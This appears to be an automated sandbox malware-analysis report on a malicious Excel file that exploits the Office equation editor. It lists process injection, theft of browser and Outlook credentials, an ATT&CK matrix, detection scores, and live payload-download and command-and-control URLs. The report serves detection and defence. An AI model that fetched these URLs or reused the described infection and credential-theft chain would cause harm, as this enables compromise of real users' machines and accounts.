Source: C:\Users\user\AppData\Roaming\word.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0043916A LogonUserW,5_2_0043916A
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,5_2_0040D6D0
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_004375B0
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event,5_2_00436431
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Users\user\AppData\Roaming\word.exeJump to behavior
Source: C:\Program Files (x86)\VOZtgxBxyGdAUEZvVwbwrTYrUzPcxRMLrHdkNbFxtliZLdHQCgXCuTeJXDKktVwKpQjyF\XAgFxCrXhYKjE.exeProcess created: C:\Windows\SysWOW64\msinfo32.exe "C:\Windows\SysWOW64\msinfo32.exe"Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,5_2_00445DD3
Source: XAgFxCrXhYKjE.exe, 00000007.00000000.520865647.0000000000A80000.00000002.00000001.00040000.00000000.sdmp, XAgFxCrXhYKjE.exe, 00000007.00000002.671047825.0000000000A80000.00000002.00000001.00040000.00000000.sdmp, XAgFxCrXhYKjE.exe, 0000000A.00000002.670948915.00000000008F0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
Source: word.exe, XAgFxCrXhYKjE.exe, 00000007.00000000.520865647.0000000000A80000.00000002.00000001.00040000.00000000.sdmp, XAgFxCrXhYKjE.exe, 00000007.00000002.671047825.0000000000A80000.00000002.00000001.00040000.00000000.sdmp, XAgFxCrXhYKjE.exe, 0000000A.00000002.670948915.00000000008F0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: word.exe, 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmp, word.exe, 00000005.00000000.461005093.0000000000482000.00000002.00000001.01000000.00000004.sdmp, word.exe.2.dr, kontempt2.1[1].exe.2.drBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: XAgFxCrXhYKjE.exe, 00000007.00000000.520865647.0000000000A80000.00000002.00000001.00040000.00000000.sdmp, XAgFxCrXhYKjE.exe, 00000007.00000002.671047825.0000000000A80000.00000002.00000001.00040000.00000000.sdmp, XAgFxCrXhYKjE.exe, 0000000A.00000002.670948915.00000000008F0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: !Progman
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_00410D10 cpuid 5_2_00410D10
Source: C:\Windows\SysWOW64\msinfo32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\jvetpvrp.zip VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\jvetpvrp.zip VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\jvetpvrp.zip VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\jvetpvrp.zip VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\jvetpvrp.zip VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\jvetpvrp.zip VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\jvetpvrp.zip VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\jvetpvrp.zip VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,5_2_004223BC
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004711D2 GetUserNameW,5_2_004711D2
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0042039F __invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,5_2_0042039F
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,5_2_0040E470
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

barindex
Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior
Source: kontempt2.1[1].exe.2.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
Source: word.exeBinary or memory string: WIN_XP
Source: word.exeBinary or memory string: WIN_XPe
Source: word.exeBinary or memory string: WIN_VISTA
Source: word.exeBinary or memory string: WIN_7
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,5_2_004741BB
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket,5_2_0046483C
Source: C:\Users\user\AppData\Roaming\word.exeCode function: 5_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,5_2_0047AD92
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E0B34D sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,8_2_61E0B34D
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E2D5B6 sqlite3_bind_double,sqlite3_mutex_leave,8_2_61E2D5B6
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E9553A sqlite3_step,sqlite3_bind_int,sqlite3_malloc,memcmp,sqlite3_finalize,sqlite3_free,sqlite3_prepare_v2,sqlite3_free,sqlite3_free,sqlite3_step,sqlite3_reset,sqlite3_reset,sqlite3_stricmp,sqlite3_malloc,sqlite3_step,sqlite3_reset,8_2_61E9553A
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E037E6 sqlite3_bind_parameter_name,8_2_61E037E6
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E037D4 sqlite3_bind_parameter_count,8_2_61E037D4
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E2D76E sqlite3_bind_zeroblob64,sqlite3_mutex_enter,sqlite3_bind_zeroblob,sqlite3_mutex_leave,8_2_61E2D76E
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E2D72A sqlite3_bind_zeroblob,sqlite3_mutex_leave,8_2_61E2D72A
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E1572D sqlite3_bind_parameter_index,8_2_61E1572D
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E036FA sqlite3_value_frombind,8_2_61E036FA
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E2D6AD sqlite3_bind_pointer,sqlite3_mutex_leave,8_2_61E2D6AD
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E2D67C sqlite3_bind_null,sqlite3_mutex_leave,8_2_61E2D67C
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E2D656 sqlite3_bind_int,sqlite3_bind_int64,8_2_61E2D656
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E2D607 sqlite3_bind_int64,sqlite3_mutex_leave,8_2_61E2D607
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E2D99D sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,8_2_61E2D99D
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E2D96E sqlite3_bind_text16,8_2_61E2D96E
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E2D932 sqlite3_bind_text64,8_2_61E2D932
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E2D903 sqlite3_bind_text,8_2_61E2D903
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E2D8D4 sqlite3_bind_blob64,8_2_61E2D8D4
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E2D8A5 sqlite3_bind_blob,8_2_61E2D8A5
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E95B00 sqlite3_exec,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_exec,8_2_61E95B00
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E2DA9D sqlite3_bind_value,8_2_61E2DA9D
Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 8_2_61E12EEA sqlite3_mutex_enter,sqlite3_mutex_leave,sqlite3_transfer_bindings,8_2_61E12EEA
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
2
Valid Accounts
11
Native API
1
Scripting
1
Exploitation for Privilege Escalation
1
Disable or Modify Tools
1
OS Credential Dumping
2
System Time Discovery
Remote Services1
Archive Collected Data
5
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts33
Exploitation for Client Execution
1
DLL Side-Loading
1
Abuse Elevation Control Mechanism
1
Deobfuscate/Decode Files or Information
21
Input Capture
1
Account Discovery
Remote Desktop Protocol1
Browser Session Hijacking
11
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
Command and Scripting Interpreter
2
Valid Accounts
1
DLL Side-Loading
1
Abuse Elevation Control Mechanism
Security Account Manager2
File and Directory Discovery
SMB/Windows Admin Shares1
Data from Local System
4
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
Valid Accounts
2
Obfuscated Files or Information
NTDS128
System Information Discovery
Distributed Component Object Model1
Email Collection
5
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
Access Token Manipulation
1
Install Root Certificate
LSA Secrets34
Security Software Discovery
SSH21
Input Capture
Fallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts312
Process Injection
1
DLL Side-Loading
Cached Domain Credentials2
Virtualization/Sandbox Evasion
VNC3
Clipboard Data
Multiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Masquerading
DCSync3
Process Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
Valid Accounts
Proc Filesystem1
Application Window Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Modify Registry
/etc/passwd and /etc/shadow1
System Owner/User Discovery
Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron2
Virtualization/Sandbox Evasion
Network Sniffing1
Remote System Discovery
Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
Access Token Manipulation
Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task312
Process Injection
KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1538472 Sample: IND24072113_1.xlsx Startdate: 21/10/2024 Architecture: WINDOWS Score: 100 63 Malicious sample detected (through community Yara rule) 2->63 65 Antivirus / Scanner detection for submitted sample 2->65 67 Multi AV Scanner detection for dropped file 2->67 69 13 other signatures 2->69 11 EXCEL.EXE 7 10 2->11         started        process3 file4 39 C:\Users\user\Desktop\~$IND24072113_1.xlsx, data 11->39 dropped 14 EQNEDT32.EXE 12 11->14         started        process5 dnsIp6 55 timurtrading.my 192.3.255.145, 443, 49161, 49162 AS-COLOCROSSINGUS United States 14->55 43 C:\Users\user\AppData\Roaming\word.exe, PE32 14->43 dropped 45 C:\Users\user\AppData\...\kontempt2.1[1].exe, PE32 14->45 dropped 57 Installs new ROOT certificates 14->57 59 Office equation editor establishes network connection 14->59 61 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 14->61 19 word.exe 1 14->19         started        file7 signatures8 process9 signatures10 75 Multi AV Scanner detection for dropped file 19->75 77 Machine Learning detection for dropped file 19->77 79 Writes to foreign memory regions 19->79 81 3 other signatures 19->81 22 svchost.exe 19->22         started        process11 signatures12 83 Maps a DLL or memory area into another process 22->83 25 XAgFxCrXhYKjE.exe 22->25 injected process13 signatures14 85 Maps a DLL or memory area into another process 25->85 87 Found direct / indirect Syscall (likely to bypass EDR) 25->87 28 msinfo32.exe 1 20 25->28         started        process15 dnsIp16 53 www.sqlite.org 45.33.6.223, 49164, 80 LINODE-APLinodeLLCUS United States 28->53 41 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32 28->41 dropped 89 Tries to steal Mail credentials (via file / registry access) 28->89 91 Tries to harvest and steal browser information (history, passwords, etc) 28->91 93 Maps a DLL or memory area into another process 28->93 95 Queues an APC in another process (thread injection) 28->95 33 XAgFxCrXhYKjE.exe 28->33 injected 37 firefox.exe 28->37         started        file17 signatures18 process19 dnsIp20 47 www.myprefpal.xyz 33->47 49 jilifish.win 15.197.148.33, 49169, 49170, 49171 TANDEMUS United States 33->49 51 4 other IPs or domains 33->51 71 Found direct / indirect Syscall (likely to bypass EDR) 33->71 signatures21 73 Performs DNS queries to domains with low reputation 47->73

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
IND24072113_1.xlsx71%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
IND24072113_1.xlsx53%VirustotalBrowse
IND24072113_1.xlsx100%AviraEXP/CVE-2017-11882.Gen
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\word.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\kontempt2.1[1].exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\kontempt2.1[1].exe32%ReversingLabsWin32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\sqlite3.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\word.exe32%ReversingLabsWin32.Trojan.Generic
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
https://duckduckgo.com/ac/?q=0%URL Reputationsafe
http://crl.entrust.net/server1.crl00%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
http://ocsp.entrust.net0D0%URL Reputationsafe
https://secure.comodo.com/CPS00%URL Reputationsafe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
http://www.sqlite.org/copyright.html.0%URL Reputationsafe
NameIPActiveMaliciousAntivirus DetectionReputation
www.75e296qdx.top
185.196.10.234
truefalse
    unknown
    myprefpal.xyz
    15.197.148.33
    truetrue
      unknown
      timurtrading.my
      192.3.255.145
      truetrue
        unknown
        www.sqlite.org
        45.33.6.223
        truefalse
          unknown
          www.omnibizlux.biz
          167.172.133.32
          truefalse
            unknown
            jilifish.win
            15.197.148.33
            truefalse
              unknown
              www.myprefpal.xyz
              unknown
              unknowntrue
                unknown
                www.jilifish.win
                unknown
                unknownfalse
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  https://timurtrading.my/kontempt2.1.exetrue
                    unknown
                    http://www.omnibizlux.biz/8pmv/?eDZh=0pI0vDB&IDX46=o+HDgodiamRQHtDMpIt6QXV1yFQyIuHAMV1gOVYcjWmvuGh+h7IrtYfSQO/kpwxsxn8zwcxo4M/m/nbjbIRZpxhbjjpUXySeQkriE3Dek1xl8vaSGOlLDW237/Cafalse
                      unknown
                      http://www.75e296qdx.top/quvp/?IDX46=ZW1g+h73VjV8NmrD3A0IsvQAl9tCTvv5s7OxxnbN69qnRFmJveufixywo3eCJN9Bi9pNL2fgeIfBDTgJwEUErU/4IwV0Yt2V4k+CbVZpThcE8pzI6qgsTHE3GSfU&eDZh=0pI0vDBfalse
                        unknown
                        http://www.sqlite.org/2022/sqlite-dll-win32-x86-3380000.zipfalse
                          unknown
                          http://www.myprefpal.xyz/2xrt/?IDX46=t8QlsLf/hSao5OfTjGXyvO3SE3egRcZN/0WYGutq4Zw3gZ9pwtfqpd7Txie7AUKWMV3AhFtCGrZ0PcR2NtL0Erm7E7qQmCH1czZzhi0sD+dlnO4gaz+HrJe+v97h&eDZh=0pI0vDBfalse
                            unknown
                            http://www.jilifish.win/to3j/false
                              unknown
                              http://www.75e296qdx.top/quvp/false
                                unknown
                                http://timurtrading.my/kontempt2.1.exetrue
                                  unknown
                                  http://www.myprefpal.xyz/2xrt/false
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabmsinfo32.exe, 00000008.00000003.584885355.0000000006133000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://duckduckgo.com/ac/?q=msinfo32.exe, 00000008.00000003.584885355.0000000006133000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://crl.entrust.net/server1.crl0EQNEDT32.EXE, 00000002.00000002.461489671.00000000006CF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460914871.00000000006CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://ocsp.entrust.net03EQNEDT32.EXE, 00000002.00000002.461489671.00000000006CF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460914871.00000000006CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
